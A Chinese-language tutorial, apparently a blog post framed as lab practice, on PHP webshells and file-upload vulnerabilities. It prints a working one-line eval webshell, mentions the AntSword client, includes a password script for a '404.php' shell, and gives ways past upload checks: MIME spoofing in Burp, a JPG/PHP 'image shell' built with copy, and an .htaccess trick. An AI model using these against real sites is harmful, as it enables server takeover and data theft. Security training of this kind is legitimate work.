木马——文件上传

目录

1、WebShell

2.一句话木马

靶场训练

3.蚁剑

虚拟终端

文件管理

[​编辑 数据操作](#编辑 数据操作)

4.404.php

5.文件上传漏洞

客户端JS检测

右键查看元素,删除检测代码

BP拦截JPG修改为php

服务端检测

1.MIME类型检测

2.文件幻数检测

3.后缀名检测


1、WebShell

WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用W ebS h ell连接到服务器,并可对服务器进行操作。

前提是后端一定可以解析这种环境。

2.一句话木马

php 复制代码
<?php @eval($_POST[a]); ?>




靶场训练

原理:

1.上传时,客户端是可控的,比如要求上传一个图片,但是可以上传php文件

2.上传后,数据库系统对文件的筛选不严格,导致木马可以入侵

3.蚁剑

URL填muma.php的绝对路径

连接密码是参数名

虚拟终端

文件管理

数据操作

4.404.php

提前将pass值为admin的结果运行出来

php 复制代码
<? 
$salt = "silic1234";
$pass = "admin";
$pass = $salt.$pass;
$pass = md5(md5(md5($pass)));
echo $pass;
?>

然后将运行结果替换到password

在php路径下输入变量名,成功入侵!

5.文件上传漏洞

客户端JS检测

右键查看元素,删除检测代码

BP拦截JPG修改为php

服务端检测

1.MIME类型检测

服务端检测,上传的是PHP类型

打开BP拦截后

根据下面这个表修改MIME类型

|-----------|--------------------------|
| .jpg | image/jpeg |
| .gif | image/gig |
| .png | image/png |
| .txt | text/plain |
| .word | application/msword |
| .html | text/html |
| .*(二进制流) | application/octet-stream |

Forward后成功上传到了服务器

2.文件幻数检测

什么是文件幻数?

文件幻数检测,即文件头检测,主要是检测文件内容开头处的文件幻数。每个图片类型

的前几个字节代表的意义是不同的,这几个独特的字节就是幻数。


PHP文件和JPG文件的幻数是不一样的,因此我们可以用一种图片马的东西来绕过这种检测。图片马的幻数是JPG的,却包含PHP代码。

图片马,用一句话木马和图片组合。

管理员CMD 运行 copy 1.jpg/b + muma.php/a muma1.jpg

muma1.jpg就是图片马

3.后缀名检测

大部分网页会过滤掉和php可能的所有文件。这种情况下,入侵的办法是在上传图片马的情况下,上传配置文件.htaccess,这个文件可以把Jpg作为Php来执行。

相关推荐
啵啵鱼爱吃小猫咪43 分钟前
Ubuntu 20.04 + ROS Noetic 源码安装 libfranka 0.8.0 和 franka_ros 0.8.0 完整教程
linux·运维·ubuntu
Piko6141 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记
ljs6482739512 小时前
Linux运维实操:vi编辑器永久配置静态IP(CentOS系列)
linux·运维·编辑器
2301_780303902 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
AOwhisky2 小时前
Python 学习笔记(第三期)——流程控制:条件判断与循环结构
运维·笔记·python·学习·云原生·流程控制·循环
IpdataCloud2 小时前
AI生成的Avalon恶意框架怎么防?用IP离线库识别模块化C2通信
运维·人工智能·网络协议·tcp/ip·ip
极客先躯2 小时前
高级java每日一道面试题-2026年03月30日-实战篇[Docker]-如何监控容器的网络流量?
java·运维·docker·容器·prometheus·高级面试
Waay3 小时前
Linux 三个核心环境变量配置文件、作用域、生效方式完整梳理
linux·运维·学习·云原生·容器
Piko6143 小时前
锐捷交换机 DHCP Server部署
运维·网络·笔记
jieyucx4 小时前
Shell实战:无限循环监控Nginx服务,异常自动重启+双份日志留存
linux·运维·nginx·自动化·shell